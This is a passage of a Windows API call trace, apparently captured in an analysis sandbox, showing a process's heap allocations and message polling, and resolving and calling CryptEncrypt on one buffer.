RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0203.004] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0203.004] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0203.004] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0203.004] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.005] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.005] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0203.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0203.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0203.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0203.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0203.006] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0203.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0203.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0203.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0203.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0203.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0203.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0x10ce020 [0203.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10ce020 | out: hHeap=0x970000) returned 1 [0203.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0203.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0203.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0203.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0203.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0203.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0203.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0203.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0203.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.032] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0203.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0203.033] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb81d0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xb81d8) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 